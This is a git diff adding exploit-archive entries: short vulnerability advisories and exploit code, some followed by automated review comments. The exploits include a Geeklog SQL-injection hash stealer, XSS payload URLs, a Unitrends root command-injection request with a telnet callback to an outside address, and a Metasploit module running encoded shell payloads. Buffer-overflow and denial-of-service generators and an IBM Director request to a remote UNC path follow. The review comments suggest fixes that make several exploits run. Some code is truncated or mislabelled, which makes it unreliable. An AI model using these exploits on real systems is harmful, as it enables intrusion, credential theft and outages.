+++ b/platforms/php/webapps/32910.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/34551/info
+
+Phorum is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
+
+Phorum 5.2.10 and 5.2-dev are vulnerable; other versions may also be affected.
+
+http://www.example.com/phorum-5.2.10/admin.php?module=badwords&curr=1">",
+location="http://www.victim.com/phorum-5.2.10/versioncheck.php";
\ No newline at end of file
diff --git a/platforms/php/webapps/32914.php b/platforms/php/webapps/32914.php
new file mode 100755
index 000000000..0efd4a242
--- /dev/null
+++ b/platforms/php/webapps/32914.php
@@ -0,0 +1,97 @@
+source: http://www.securityfocus.com/bid/34553/info
+
+Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Geeklog 1.5.2 and earlier are vulnerable.
+
+tmp); $i++) {
+ $tmp_i = explode(";", $tmp[$i]);
+ $cookies .= $tmp_i[0]."; ";
+ }
+ if (stripos ($cookies, "\x70\x61\x73\x73\x77\x6f\x72\x64")) {
+ return $cookies;
+ } else {
+ die("[*] Unable to login!");
+ }
+
+ }
+
+ function xtrct_prefix() {
+ global $host, $port, $path, $cookies, $url;
+ $out = _s($url, $cookies, 0, "");
+ $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
+ if (count($tmp) < 2) {
+ die("[!] Not logged in!");
+ }
+ $tmp = explode("\x22", $tmp[0]);
+ $prefix = $tmp[count($tmp)-1];
+ return $prefix;
+ }
+
+ function is_checked() {
+ global $host, $port, $path, $cookies, $url;
+ $out = _s($url, $cookies, 0, "");
+ $tmp = explode("\x62\x6c\x6f\x63\x6b\x73\x5b\x5d", $out);
+ $tmp = explode("\x3e", $tmp[1]);
+ $s = $tmp[0];
+ if (stripos ($s, "\x22\x63\x68\x65\x63\x6b\x65\x64\x22")) {
+ return 1;
+ } else {
+ return 0;
+ }
+ }
+
+ if (!$_use_ck) {
+ $cookies = login();
+ }
+
+ $url = "http://$host:$port".$path."usersettings.php";
+ $prefix = xtrct_prefix();
+ print "[*] prefix->'".$prefix."'\n";
+
+ if (!$_skiptest) {
+ run_test();
+ }
+ if ($_test) {
+ die;
+ }
+
+ #uncheck all boxes
+ $rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE
+".$where." LIMIT 1/*";
+ $out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
+ #then start extraction
+ $c = array();
+ $c = array_merge($c, range(0x30, 0x39));
+ $c = array_merge($c, range(0x61, 0x66));
+ $url = "http://$host:$port".$path;
+ $_hash = "";
+ print ("[*] Initiating hash extraction ...\n");
+ for ($j = 1; $j < 0x21; $j++) {
+ for ($i = 0; $i <= 0xff; $i++) {
+ $f = false;
+ if (in_array($i, $c)) {
+ $sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR
+1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*";
+ $url = "http://$host:$port".$path."usersettings.php";
+ $out = _s($url, $cookies, 1,
+"mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&");
+ if (is_checked()) {
+ $f = true;
+ $_hash .= chr($i);
+ print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
+ #if found , uncheck again
+ $out = _s($url, $cookies, 1,
+"mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
+ break;
+ }
+ }
+ }
+ if ($f == false) {
+ die("\n[!] Unknown error ...");
+ }
+ }
+ print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
+?>
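Review bot: The archived file is not a complete program: its code begins mid-statement at `tmp); $i++) {`, so the opening `<?php` tag, the start of `login()`, the `_s()` request helper, `run_test()`, and the assignments of `$host`, `$port`, `$path`, `$where`, `$uid`, `$_use_ck`, `$_skiptest` and `$_test` that the visible code reads are all missing — presumably lost when angle-bracket content was stripped from the advisory text on import. The prose header (`source: …` through `Geeklog 1.5.2 and earlier are vulnerable.`) also sits outside any PHP tag or comment, so the file neither parses nor tells the reader what was dropped. If the original cannot be recovered, a leading comment such as `// NOTE: listing truncated on import; helper definitions and configuration missing` would save the next reader from trying to run it. Separately, the `stripos(...)` results in `login()` and `is_checked()` are used directly as booleans; `stripos()` returns `0` for a match at offset zero, so the idiomatic check is `stripos(...) !== false`.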
diff --git a/platforms/unix/remote/32811.txt b/platforms/unix/remote/32811.txt
new file mode 100755
index 000000000..f51bbe5eb
--- /dev/null
+++ b/platforms/unix/remote/32811.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33880/info
+
+Adobe Flash Player is prone to a remote code-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will likely crash the application, denying service to legitimate users.
+
+Versions prior to Flash Player 10.0.12.36 are vulnerable.
+
+http://www.exploit-db.com/sploits/32811.rar
\ No newline at end of file
diff --git a/platforms/unix/remote/32885.rb b/platforms/unix/remote/32885.rb
new file mode 100755
index 000000000..047f984f5
--- /dev/null
+++ b/platforms/unix/remote/32885.rb
@@ -0,0 +1,101 @@
+Unitrends Enterprise Backup 7.3.0
+
+Multiple vulnerabilities exist within this piece of software. The largest one is likely the fact that the ‘auth’ string used for authorization isn’t random at all. After authentication, any requests made by the browser send no cookies and only check this ‘auth’ param, which is completely insufficient. Because of this, unauthenticated users can know what the ‘auth’ parameter should be and make requests as the ‘root’ user.
+
+Unauthenticated root RCE
+Because the ‘auth’ variable is not random, an unauthenticated user can post a specially crafted request to the /recoveryconsole/bpl/snmpd.php PHP script. This script does not sanitize the SNMP community string properly which allows the user to execute remote commands as the root user. A metasploit module that exploits this has been given alongside this report. Below is the actual request. To recreate, after authentication, click on Settings -> Clients, Networking, and Notifications -> SNMP and Modify the ‘notpublic’ entry to contain bash metacharacters.
+
+POST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0 HTTP/1.1
+Host: 172.31.16.99
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Connection: keep-alive
+Referer: https://172.31.16.99/recoveryconsole/bpria/bin/bpria.swf?vsn=7.3.0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 58
+
+auth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100
+
+-----------------------------------
+
+Metasploit module:
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Unitrends Unauthenticated Root RCE",
+ 'Description' => %q{
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brandon Perry ' #discovery/metasploit module
+ ],
+ 'References' =>
+ [
+ ],
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' =>
+ [
+ ['Unitrends Enterprise Backup 7.3.0', {}]
+ ],
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'python telnet netcat perl'
+ }
+ },
+ 'DisclosureDate' => "Mar 21 2014",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
+ ], self.class)
+ end
+
+ def exploit
+
+ pay = Rex::Text.encode_base64(payload.encoded)
+ get = {
+ 'type' => 'update',
+ 'sid' => '1',
+ 'comm' => 'notpublic`echo '+pay+'|base64 --decode|sh`',
+ 'enabled' => '1',
+ 'rx' => '4335379',
+ 'ver' => '7.3.0',
+ 'gcv' => '0'
+ }
+
+ post = {
+ 'auth' => '1:/usr/bp/logs.dir/gui_root.log:100'
+ }
+
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'recoveryconsole', 'bpl', 'snmpd.php'),
+ 'vars_get' => get,
+ 'vars_post' => post,
+ 'method' => 'POST'
+ })
+
+ end
+end
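Review bot: The advisory prose from `Unitrends Enterprise Backup 7.3.0` down to `Metasploit module:` precedes `require 'msf/core'` without being commented out, so the file as committed is not loadable as a Ruby module; either prefix those lines with `#` or move the summary into the module's `'Description'`, which is currently an empty `%q{ }`. `'References'` is likewise an empty array even though the text above identifies the vulnerable script and the static `auth` value; a `['URL', '<vendor or advisory URL>']` entry, or the CVE/BID if one exists, belongs there so the module documents its own provenance. In `exploit`, the `'comm'` value is assembled with `+` concatenation; Ruby style prefers a single interpolated string (`#{pay}`) here, and the hash literals would read better with consistent quoting and alignment matching the rest of the module.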
diff --git a/platforms/unix/remote/32890.txt b/platforms/unix/remote/32890.txt
new file mode 100755
index 000000000..b831534d4
--- /dev/null
+++ b/platforms/unix/remote/32890.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/34383/info
+
+The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/windows/dos/32706.txt b/platforms/windows/dos/32706.txt
index 959e0c747..21c29c351 100755
--- a/platforms/windows/dos/32706.txt
+++ b/platforms/windows/dos/32706.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Notepad++ - DSpellCheck plugin[DOS]
+# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/
diff --git a/platforms/windows/dos/32824.pl b/platforms/windows/dos/32824.pl
new file mode 100755
index 000000000..1e2963fd9
--- /dev/null
+++ b/platforms/windows/dos/32824.pl
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/33934/info
+
+Internet Download Manager (IDM) is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects IDM 5.15 Build 3; other versions may also be vulnerable.
+
+#Internet Download Manager v.5.15 Build 3 (4 December)
+#Works on Vista
+#HellCode Labs || TCC Group || http://tcc.hellcode.net
+#Bug was found by "musashi" aka karak0rsan
+[musashi@hellcode.net]
+#thanx to murderkey
+$file="idm_tr.lng";
+$lng= "lang=0x1f Türkçe";
+$buffer = "\x90" x 1160;
+$eip = "AAAA";
+$toolbar = "20376=";
+$packet=$toolbar.$buffer.$eip;
+open(file, '>' . $file);
+print file $lng;
+print file "\n";
+print file $packet;
+close(file);
+print "File has created!\n";
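Review bot: The line `[musashi@hellcode.net]` is the wrapped continuation of the `#Bug was found by …` comment but carries no `#`, so Perl will try to parse it as code; it should read `#[musashi@hellcode.net]`. The seven lines of prose above `#Internet Download Manager v.5.15 Build 3` are likewise uncommented, so the file is not runnable as committed. The file-writing code uses a bareword filehandle and ignores `open` failures; the lexical three-argument form `open(my $fh, '>', $file) or die "Cannot open $file: $!";` with matching `print $fh …` and `close($fh)` is the idiomatic replacement. The literal `Türkçe` in `$lng` is non-ASCII with no `use utf8` or encoding layer, so it is written out as whatever bytes the source file happens to be saved in — worth stating in a comment next to the assignment.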
diff --git a/platforms/windows/dos/32881.py b/platforms/windows/dos/32881.py
new file mode 100755
index 000000000..66ceb7f2a
--- /dev/null
+++ b/platforms/windows/dos/32881.py
@@ -0,0 +1,187 @@
+source: http://www.securityfocus.com/bid/34327/info
+
+QtWeb browser is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+
+QtWeb 2.0 is vulnerable; other versions may also be affected.
+
+
+ $S="\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A".
+ "\x3C\x74\x69\x74\x6C\x65\x3E\x51\x74\x57\x65\x62".
+ "\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x42\x72\x6F\x77\x73\x65".
+ "\x72\x20\x32". "\x2E\x30\x20".
+ "\x28\x62". "\x75\x69".
+ "\x6C\x64". "\x20\x30".
+ "\x34\x33". "\x29\x20".
+ "\x52\x65". "\x6D\x6F".
+ "\x74\x65". "\x20\x44".
+ "\x65\x6E". "\x69\x61".
+ "\x6C\x20". "\x6F\x66".
+ "\x20\x53". "\x65\x72".
+ "\x76\x69". "\x63\x65".
+ "\x20\x45". "\x78\x70".
+ "\x6C\x6F". "\x69\x74". "\x3C\x2F". "\x54\x69".
+ "\x74\x6C". "\x65". "\x3E". "\x0D". "\x0A". "\x3C\x68".
+ "\x65\x61". "\x64". "\x3E". "\x3C". "\x62". "\x6F\x64".
+ "\x79\x3E". "\x3C". "\x73". "\x63". "\x72". "\x69\x70".
+ "\x74\x20". "\x74\x79".
+ "\x70\x65". "\x3D\x22".
+ "\x74\x65". "\x78\x74".
+ "\x2F\x6A". "\x61\x76".
+ "\x61\x73". "\x63\x72".
+ "\x69\x70". "\x74\x22".
+ "\x3E\x0D". "\x0A\x61".
+ "\x6C\x65". "\x72\x74".
+ "\x28\x22". "\x51\x74".
+ "\x57\x65". "\x62\x20".
+ "\x49\x6E". "\x74\x65".
+ "\x72\x6E". "\x65\x74".
+ "\x20\x42". "\x72\x6F".
+ "\x77\x73". "\x65\x72".
+ "\x20\x32". "\x2E\x30".
+ "\x20\x28". "\x62". "\x75". "\x69\x6C".
+ "\x64\x20". "\x30". "\x34". "\x33\x29".
+ "\x20\x52". "\x65". "\x6D". "\x6F\x74".
+ "\x65\x20". "\x44". "\x65". "\x6E\x69".
+ "\x61\x6C". "\x20". "\x6F". "\x66\x20".
+ "\x53\x65". "\x72". "\x76". "\x69\x63".
+ "\x65\x20". "\x45". "\x78". "\x70\x6C".
+ "\x6F\x69". "\x74". "\x5C". "\x6E\x5C".
+ "\x6E\x5C". "\x74". "\x5C". "\x74\x5C".
+ "\x74\x62". "\x79". "\x20". "\x4C\x69".
+ "\x71\x75". "\x69". "\x64". "\x57\x6F".
+ "\x72\x6D". "\x20". "\x28". "\x63\x29".
+ "\x20\x32". "\x30". "\x30". "\x39\x22".
+ "\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
+ "\x63\x74". "\x69\x6F".
+ "\x6E\x20". "\x64\x6F".
+ "\x7A\x28". "\x29\x20".
+ "\x7B\x0D". "\x0A\x74".
+ "\x69\x74". "\x6C\x65".
+
+ "\x71\x75". "\x69". "\x64". "\x57\x6F".
+ "\x72\x6D". "\x20". "\x28". "\x63\x29".
+ "\x20\x32". "\x30". "\x30". "\x39\x22".
+ "\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
+ "\x63\x74". "\x69\x6F".
+ "\x6E\x20". "\x64\x6F".
+ "\x7A\x28". "\x29\x20".
+ "\x7B\x0D". "\x0A\x74".
+ "\x69\x74". "\x6C\x65".
+ "\x3D\x22". "\x48\x6F".
+ "\x74\x20". "\x49\x63".
+ "\x65\x22". "\x3B\x0D".
+ "\x0A\x75". "\x72\x6C".
+ "\x3D\x22". "\x68\x74".
+ "\x74\x70\x3A". "\x2F\x2F\x77".
+ "\x77\x77\x2E\x6D\x69\x6C\x77\x30\x72\x6D\x2E\x63\x6F\x6D\x2F".
+ "\x22\x3B\x0D\x0A\x69\x66\x20\x28\x77\x69\x6E\x64".
+ "\x6F\x77\x2E\x73\x69\x64\x65\x62";$M=
+
+
+
+
+ "\x61". "\x72" ."\x29". "\x20".
+ "\x7B". "\x0D" ."\x0A". "\x77". "\x69".
+ "\x6E"."\x64". "\x6F". "\x77". "\x2E".
+ "\x73". "\x69". "\x64". "\x65".
+ "\x62". "\x61". "\x72". "\x2E".
+ "\x61". "\x64". "\x64". "\x50".
+ "\x61". "\x6E". "\x65". "\x6C".
+ "\x28". "\x74". "\x69". "\x74".
+ "\x6C". "\x65". "\x2C". "\x20".
+ "\x75". "\x72". "\x6C". "\x2C".
+ "\x22". "\x22". "\x29". "\x3B".
+ "\x0D". "\x0A"."\x7D".
+ "\x20". "\x65". "\x6C".
+ "\x73";
+
+ $I="\x65\x20\x69\x66\x28\x20\x77".
+ "\x69\x6E\x64\x6F\x77".
+ "\x2E\x65\x78\x74\x65\x72\x6E".
+ "\x61\x6C\x20\x29\x20". ##############
+ "\x7B\x0D\x0A\x77\x69\x6E\x64". ## #
+ "\x6F\x77\x2E\x65"."\x78". ######
+ "\x74\x65\x72\x6E\x61". ########## _ _ _
+ "\x6C\x2E\x41\x64\x64\x46\x61\x76\x6F\x72\x69". #==---- #==---- #==----
+ "\x74\x65\x28\x20\x75".
+ "\x72\x6C\x2C\x20\x74". ##===*
+ "\x69\x74\x6C\x65\x29\x3B\x0D".
+ "\x0A\x7D\x20\x65\x6C".
+ "\x73\x65\x20\x69\x66\x28\x77".
+ "\x69\x6E\x64\x6F\x77".
+ "\x2E\x6F\x70\x65\x72\x61\x20";
+ ####################
+
+
+ $L="\x26\x26\x20\x77\x69\x6E\x64\x6F\x77\x2E".
+ "\x70\x72\x69\x6E\x74\x29\x20\x7B".
+ "\x20\x0D\x0A\x72\x65\x74".
+ "\x75\x72\x6E\x20".
+ "\x28\x74\x72".
+ "\x75\x65".
+ "\x29".
+ "\x3B".
+ "\x20\x7D".
+ "\x7D\x0D\x0A".
+ "\x76\x61\x72\x20".
+ "\x61\x73\x6B\x20\x3D\x20".
+ "\x63\x6F\x6E\x66\x69\x72\x6D\x28".
+ "\x22\x50\x72\x65\x73\x73\x20\x4F\x4B\x20".
+ "\x74\x6F\x20\x73\x74\x61\x72\x74".
+ "\x20\x74\x68\x65\x20\x44".
+ "\x6F\x53\x2E\x5C".
+ "\x6E\x50\x72".
+ "\x65\x73".
+ "\x73".
+ "\x20".
+ "\x4E\x6F".
+ "\x20\x74\x6F".
+ "\x20\x64\x6F\x64".
+ "\x67\x65\x20\x74\x68\x65".
+ "\x20\x44\x6F\x53\x2E\x22\x29\x3B".
+ "\x0D\x0A\x69\x66\x20\x28\x61\x73\x6B\x20".
+ "\x3D\x3D\x20\x74\x72\x75\x65\x29".
+ "\x20\x7B\x20\x0D\x0A\x66".
+ "\x6F\x72\x20\x28".
+ "\x78\x3D\x30".
+ "\x3B\x20".
+ "\x78".
+ "\x3C".
+ "\x78\x2B".
+ "\x31\x3B\x20".
+ "\x78\x2B\x2B\x29".
+ "\x20\x64\x6F\x7A\x28\x29".
+ "\x3B\x0D\x0A\x7D\x20\x65\x6C\x73".
+ "\x65\x09\x7B\x20\x61\x6C\x65\x72\x74\x28".
+ "\x22\x4F\x6B\x20\x3A\x28\x22\x29".
+ "\x3B\x0D\x0A\x77\x69\x6E".
+ "\x64\x6F\x77\x2E".
+ "\x6C\x6F\x63".
+ "\x61\x74".
+ "\x69".
+ "\x6F".
+ "\x6E\x2E".
+ "\x68\x72\x65".
+ "\x66\x20\x3D\x20".
+ "\x22\x68\x74\x74\x70\x3A".
+ "\x2F\x2F\x77\x77\x77\x2E\x71\x74".
+ "\x77\x65\x62\x2E\x6E\x65\x74\x2F\x22\x3B";
+ #########
+ $E="\x0D\x0A\x7D\x20".
+ "\x3C\x2F\x73\x63".
+ "\x72\x69\x70\x74".
+ "\x3E\x3C\x2F\x62".
+ "\x6F\x64\x79\x3E".
+ "\x3C\x2F\x68\x65".
+ "\x61\x64\x3E\x3C".
+ "\x2F\x68\x74\x6D".
+ "\x6C\x3E";#####____
+
+my $file = "Smile.html";
+my $fun = $S.$M.$I.$L.$E;
+open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n";
+print mrowdiuqil "$fun";
+close (mrowdiuqil);
+print "\n[+] File $file created with funny potion\!\n\n";
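Review bot: This file is added as `32881.py` but its content is Perl (`$S=...` string concatenation with `.`, `my $file`, `open (mrowdiuqil, ...)`, `print mrowdiuqil "$fun"`), so the `.py` extension misleads both readers and any tooling that picks a language from the suffix; it should be committed as `.pl` and whatever index references the path updated to match. The `open ... || die` check is fine, but the bareword filehandle `mrowdiuqil` would be clearer as a lexical handle, e.g. `open(my $fh, '>', "./$file") || die "\nMffff... $!\n";`.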
diff --git a/platforms/windows/dos/32902.py b/platforms/windows/dos/32902.py
new file mode 100755
index 000000000..9793a321d
--- /dev/null
+++ b/platforms/windows/dos/32902.py
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/34478/info
+
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions.
+
+#/usr/bin/env python
+import sys
+import random
+
+CHAR_SET = [chr(x) for x in range(0x20)]
+CHAR_SET += [chr(x) for x in range(128, 256)]
+
+def send_file():
+ l = 800000 + 4096
+ print "Content-Type: text/plain"
+ print "Content-Length: %d" % l
+ print "Cache-Control: no-cache, no-store, must-revalidate"
+ # this is not standardized, but use it anyway
+ print "Pragma: no-cache"
+ print ""
+ # bypass IE download dialog
+ sys.stdout.write("a" * 4096)
+ # print junks
+ for i in xrange(l):
+ sys.stdout.write(random.choice(CHAR_SET))
+ sys.exit()
+
+send_file()
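Review bot: The shebang on the first code line is `#/usr/bin/env python`, which is a plain comment because the `!` is missing, so the file cannot be executed directly and a CGI launcher would fall back to whatever interpreter it defaults to; it should read `#!/usr/bin/env python`. The code is Python 2 only (`print` statements, `xrange`, `sys.exit()` reached only at the end), which is worth stating in a comment such as `# Python 2 CGI script` since nothing in the file says so. `send_file` is self-contained within the hunk.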
diff --git a/platforms/windows/local/24872.txt b/platforms/windows/local/24872.txt
index 8b8168b6b..b2b9d6c98 100755
--- a/platforms/windows/local/24872.txt
+++ b/platforms/windows/local/24872.txt
@@ -1,3 +1,5 @@
+#E-DB Note: Vuln still in 6.0.3410 as well as 'Photodex ProShow Gold'
+
Inshell Security Advisory
http://www.inshell.net
diff --git a/platforms/windows/local/32771.txt b/platforms/windows/local/32771.txt
new file mode 100755
index 000000000..b796df61d
--- /dev/null
+++ b/platforms/windows/local/32771.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/33561/info
+
+Multiple Kaspersky products are prone to a local privilege-escalation vulnerability because the applications fail to perform adequate boundary checks on user-supplied data.
+
+A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects versions in the following product groups:
+
+Kaspersky AV 2008
+Kaspersky AV for WorkStations 6.0
+
+http://www.exploit-db.com/sploits/32771.zip
\ No newline at end of file
diff --git a/platforms/windows/local/32845.pl b/platforms/windows/local/32845.pl
new file mode 100755
index 000000000..3f64bf6f4
--- /dev/null
+++ b/platforms/windows/local/32845.pl
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/34065/info
+
+IBM Director is prone to a privilege-escalation vulnerability that affects the CIM server.
+
+Attackers can leverage this issue to execute arbitrary code with elevated privileges in the context of the CIM server process.
+
+Versions prior to IBM Director 5.20.3 Service Update 2 are affected.
+
+use IO::Socket;
+#1st argument: target host
+my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
+ PeerPort => "6988",
+ Proto => 'tcp');
+$payload =
+qq{
+
+
+
+
+
+
+
+ Sample CIM_AlertIndication indication
+
+
+ 1
+
+
+ 3
+
+
+ 2
+
+
+ 20010515104354.000000:000
+
+
+
+
+
+
+};
+$req =
+"M-POST /CIMListener/\\\\isowarez.de\\director\\wootwoot HTTP/1.1\r\n"
+."Host: $ARGV[0]\r\n"
+."Content-Type: application/xml; charset=utf-8\r\n"
+."Content-Length: ". length($payload) ."\r\n"
+."Man: http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40\r\n"
+."CIMOperation: MethodCall\r\n"
+."CIMExport: MethodRequest\r\n"
+."CIMExportMethod: ExportIndication\r\n\r\n";
+print $sock $req . $payload;
+
+while(<$sock>) {
+ print;
+}
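Review bot: The result of `IO::Socket::INET->new(...)` is never checked, so when the connection fails `$sock` is undef and the later `print $sock $req . $payload` and `while(<$sock>)` fail with an unhelpful runtime error instead of the connect error; appending `or die "connect to $ARGV[0]:6988 failed: $@";` to the constructor call reports the real cause. `$ARGV[0]` is also used without checking that an argument was given, and the file has no `use strict; use warnings;`, which would have flagged the undeclared `$payload` and `$req`. As rendered here the `qq{ ... }` block contains only text nodes and blank lines, which looks like the XML markup was stripped during extraction; if the committed file matches this rendering the Content-Length is still consistent but the payload is not the CIM-XML the headers describe, so that is worth confirming against the original.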
diff --git a/platforms/windows/local/32850.txt b/platforms/windows/local/32850.txt
new file mode 100755
index 000000000..d3fe7d44a
--- /dev/null
+++ b/platforms/windows/local/32850.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/34103/info
+
+Multiple SlySoft products are prone to multiple buffer-overflow vulnerabilities because they fail to adequately validate user-supplied input.
+
+A local attacker can exploit these issues to execute arbitrary code with SYSTEM-level privileges. Failed attacks will result in denial-of-service conditions.
+
+The following applications are vulnerable:
+
+SlySoft AnyDVD 6.5.2.2
+SlySoft AnyDVD HD 6.5.2.2
+SlySoft Virtual CloneDrive 5.4.2.3
+SlySoft CloneDVD 2.9.2.0
+SlySoft CloneCD 5.3.1.3
+
+http://www.exploit-db.com/sploits/32850.zip
\ No newline at end of file
diff --git a/platforms/windows/local/32891.txt b/platforms/windows/local/32891.txt
new file mode 100755
index 000000000..0927eb3ba
--- /dev/null
+++ b/platforms/windows/local/32891.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/34442/info
+
+Microsoft Windows is prone to a privilege-escalation vulnerability.
+
+Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
+
+The issue affects the following:
+
+Windows XP SP2
+Windows Server 2003
+Windows Vista
+Windows Server 2008
+
+http://www.exploit-db.com/sploits/32891.zip
\ No newline at end of file
diff --git a/platforms/windows/local/32892.txt b/platforms/windows/local/32892.txt
new file mode 100755
index 000000000..8fea298a2
--- /dev/null
+++ b/platforms/windows/local/32892.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/34443/info
+
+Microsoft Windows is prone to a privilege-escalation vulnerability.
+
+Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
+
+The issue affects the following:
+
+Windows XP SP2
+Windows Server 2003
+
+http://www.exploit-db.com/sploits/32892.zip
\ No newline at end of file
diff --git a/platforms/windows/local/32893.txt b/platforms/windows/local/32893.txt
new file mode 100755
index 000000000..fa9b68610
--- /dev/null
+++ b/platforms/windows/local/32893.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/34444/info
+
+Microsoft Windows is prone to a privilege-escalation vulnerability.
+
+Successful exploits may allow attackers to elevate their privileges to LocalSystem, which would facilitate the complete compromise of affected computers.
+
+The issue affects the following:
+
+Windows Vista
+Windows Server 2008
+
+http://www.exploit-db.com/sploits/32893.zip
\ No newline at end of file
diff --git a/platforms/windows/remote/32826.html b/platforms/windows/remote/32826.html
new file mode 100755
index 000000000..a2c6c025d
--- /dev/null
+++ b/platforms/windows/remote/32826.html
@@ -0,0 +1,5 @@
+source: http://www.securityfocus.com/bid/33942/info
+
+iDefense COMRaider ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/32832.c b/platforms/windows/remote/32832.c
new file mode 100755
index 000000000..31683edfb
--- /dev/null
+++ b/platforms/windows/remote/32832.c
@@ -0,0 +1,97 @@
+source: http://www.securityfocus.com/bid/33954/info
+
+
+NovaStor NovaNET is prone to a stack-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized buffer.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the affected application or cause a denial-of-service condition.
+
+NovaNET 12 is vulnerable; other versions may also be affected.
+
+import os
+import sys
+import socket
+#NovaNet 12 PoC by AbdulAziz Hariri.
+
+request1_1 =("\x54\x84\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x92\x00\x00\x00"+
+"\x03\x3f\xfb\x76\x08\x20\x80\x00\x7f\xe3\x08\x88\x57\x3b\x77\x80"+
+"\x01\x00\x00\x00\xc0\xa8\x01\x42\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
+"\x00\x00\x00\x00\x30\x58\x39\x30\x00\x63\x88\x77\xfe\xff\xff\xff"+
+"\x1b\x3f\xfb\x76\x6a\x31\x41\x73\xb0\x03\x00\x00\xff\xff\x00\x00"+
